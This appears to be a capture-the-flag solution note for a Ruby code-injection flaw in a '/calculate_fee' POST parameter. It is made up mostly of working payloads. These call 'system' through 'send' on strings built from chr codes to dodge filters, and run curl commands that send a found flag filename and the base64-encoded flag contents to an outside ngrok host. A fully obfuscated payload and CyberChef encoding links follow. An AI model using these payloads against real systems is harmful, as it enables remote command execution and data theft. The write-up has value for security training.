Exploit path:

Use 123.chr to generate strings
Use send to call function given by string
Ruby does not expect parantheses, so we are good to go

Final payload:

in POST to /calculate_fee, put in user_exit_price:

send "system", "curl https://04a6-2003-cd-c743-b771-1507-5483-8921-f7b5.ngrok-free.app/$(find . -regextype sed -regex ".*/flag-.*" 2>/dev/null | tail -n 1)" || 1

In order to achieve this, it must be encoded so that it looks as follows:

send 115.chr+121.chr+115.chr+116.chr+101.chr+109.chr,99.chr+117.chr+114.chr+108.chr+32.chr+104.chr+116.chr+116.chr+112.chr+115.chr+58.chr+47.chr+47.chr+48.chr+52.chr+97.chr+54.chr+45.chr+50.chr+48.chr+48.chr+51.chr+45.chr+99.chr+100.chr+45.chr+99.chr+55.chr+52.chr+51.chr+45.chr+98.chr+55.chr+55.chr+49.chr+45.chr+49.chr+53.chr+48.chr+55.chr+45.chr+53.chr+52.chr+56.chr+51.chr+45.chr+56.chr+57.chr+50.chr+49.chr+45.chr+102.chr+55.chr+98.chr+53.chr+46.chr+110.chr+103.chr+114.chr+111.chr+107.chr+45.chr+102.chr+114.chr+101.chr+101.chr+46.chr+97.chr+112.chr+112.chr+47.chr+36.chr+40.chr+99.chr+97.chr+116.chr+32.chr+46.chr+47.chr+102.chr+108.chr+97.chr+103.chr+45.chr+49.chr+57.chr+101.chr+54.chr+99.chr+102.chr+50.chr+102.chr+99.chr+102.chr+101.chr+100.chr+52.chr+55.chr+56.chr+49.chr+98.chr+55.chr+99.chr+53.chr+52.chr+97.chr+55.chr+99.chr+97.chr+51.chr+97.chr+98.chr+54.chr+55.chr+100.chr+100.chr+32.chr+124.chr+32.chr+98.chr+97.chr+115.chr+101.chr+54.chr+52.chr+41.chr || 1


This gives the filename for the flag. Finally do the same with the following payload:

send "system", "curl https://04a6-2003-cd-c743-b771-1507-5483-8921-f7b5.ngrok-free.app/$(cat ./flag-19e6cf2fcfed4781b7c54a7ca3ab67dd | base64)" || 1



See cyberchef:

https://cyberchef.io/#recipe=To_Hex('Space',0/disabled)To_Decimal('Space',false)Find_/_Replace(%7B'option':'Regex','string':'(%5C%5Cd?%5C%5Cd?%5C%5Cd)'%7D,'$1.chr',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%20'%7D,'%2B',true,false,true,false)&input=Y3VybCBodHRwczovLzA0YTYtMjAwMy1jZC1jNzQzLWI3NzEtMTUwNy01NDgzLTg5MjEtZjdiNS5uZ3Jvay1mcmVlLmFwcC8kKGZpbmQgLiAtcmVnZXh0eXBlIHNlZCAtcmVnZXggIi4qL2ZsYWctLioiIDI%2BL2Rldi9udWxsIHwgdGFpbCAtbiAxKQ

https://cyberchef.io/#recipe=To_Hex('Space',0/disabled)To_Decimal('Space',false)Find_/_Replace(%7B'option':'Regex','string':'(%5C%5Cd?%5C%5Cd?%5C%5Cd)'%7D,'$1.chr',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%20'%7D,'%2B',true,false,true,false)&input=Y3VybCBodHRwczovLzA0YTYtMjAwMy1jZC1jNzQzLWI3NzEtMTUwNy01NDgzLTg5MjEtZjdiNS5uZ3Jvay1mcmVlLmFwcC8kKGNhdCAuL2ZsYWctMTllNmNmMmZjZmVkNDc4MWI3YzU0YTdjYTNhYjY3ZGQgfCBiYXNlNjQp
